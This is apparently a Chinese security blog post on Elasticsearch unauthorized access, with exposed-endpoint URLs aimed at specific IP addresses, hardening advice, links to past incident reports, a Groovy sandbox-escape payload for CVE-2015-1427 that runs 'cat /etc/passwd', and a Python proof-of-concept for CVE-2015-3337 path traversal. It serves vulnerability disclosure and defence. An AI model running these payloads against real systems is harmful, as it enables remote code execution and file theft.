ElasticSearch未授权访问

最新推荐文章于 2025-10-08 19:05:45 发布

原创最新推荐文章于 2025-10-08 19:05:45 发布 · 7.8k 阅读

5 ·

CC 4.0 BY-SA版权

安全专栏收录该内容

26 篇文章

订阅专栏

本文介绍了ElasticSearch未授权访问的安全问题，包括漏洞描述、可能的利用URL，以及提供了一系列修复建议，如设置防火墙、使用Nginx反向代理和限制IP访问等。此外，列举了历史上相关漏洞事件，并详细讨论了CVE-2015-1427的Groovy RCE漏洞，给出了POST请求示例。

0x00 漏洞描述：

Elasticsearch是一款java编写的企业级搜索服务。越来越多的公司使用ELK作为日志分析，启动此服务默认会开放9200端口，可被非法操作数据

0x01 一些利用的URL

http://101.198.161.130:9200/_cat/indices/
http://101.198.161.130:9200/_plugin/head/
http://101.198.161.130:9200/_nodes
http://101.198.161.130:9200/_nodes?prettify
http://101.198.161.130:9200/_status
http://101.198.161.130:9200/_search?pretty
http://10.203.9.131:9200/zjftu/
http://10.203.9.131:9200/zjftu/_search?pretty

0x02 修复建议：

1、防火墙上设置禁止外网访问9200端口。
2、使用Nginx搭建反向代理，通过配置Nginx实现对Elasticsearch的认证
3、限制IP访问，绑定固定IP
4、在config/elasticsearch.yml中为9200端口设置认证：

    http.basic.enabled true #开关，开启会接管全部HTTP连接
    http.basic.user "admin" #账号
    http.basic.password "admin_pw" #密码
    http.basic.ipwhitelist ["localhost", "127.0.0.1"]

0x03 历史事件漏洞

安全脉搏搜索
乌云镜像搜索
CNVD搜索

1 360手机一处Elasticsearch未授权访问 (2016-04-19)
https://www.secpulse.com/archives/46394.html

2 暴风某站Elasticsearch未授权访问&Hadoop未授权访问(2016-04-27)
https://www.secpulse.com/archives/49115.html

3 新华网某频道服务器一处Elasticsearch配置不当/可任意操作/涉及被采访人员信息(2016-03-19)
https://www.secpulse.com/archives/46976.html

(ElasticSearch RCE)
4 神器而已证券系列之九州证券某站Elasticsearch远程代码执行漏洞(2015-09-11 18:30)
(内含少量内网套路)
https://www.secpulse.com/archives/39822.html

5 风行某站Elasticsearch配置不当（任意文件读取）
https://www.secpulse.com/archives/41126.html

6 上海某服务器一处Elasticsearch配置不当/可任意操作/涉及大量敏感信息(790多W用户姓名\身份证号\民族\开房时间\退房时间\房间号等)(2016-03-16)
https://www.secpulse.com/archives/46801.html

7 广西移动一处Elasticsearch配置不当/可任意操作/涉及大量敏感信息(用户手机号码/IMEI/IMSI/上网时间/地点等)
https://www.secpulse.com/archives/46798.html

0x04 ElasticSearch Groovy RCE (CVE-2015-1427)

影响范围
The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.

对一下链接进行一个POST

http://127.0.0.1:9200/_search?pretty

POST的data域如下

{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}

几个其他Exp

https://www.waitalone.cn/elasticsearch-exp.html
https://www.waitalone.cn/elasticsearch.html
http://www.freebuf.com/sectool/38025.html
http://blog.youkuaiyun.com/u011066706/article/details/51175761

0x05 es_poc_1.py

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import requests
host= "10.203.9.131"
port = 9200
def elastic_directoryTraversal(host,port):
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']
pList = ['/../../../../../../../../../../../../../../etc/passwd','/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd','/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini']
for p in pluginList:
for path in pList:
urlA = "http://%s:%d/_plugin/%s%s" % (host,port,p,path)
try:
content = requests.get(urlA,timeout=5,allow_redirects=True,verify=False).content
print content
print "\n-------------------------------------------------------------\n"
if "/root:/" in content:
print 'Elasticsearch 任意文件读取漏洞(CVE-2015-3337) Found!'
except Exception,e:
print e
elastic_directoryTraversal(host,port)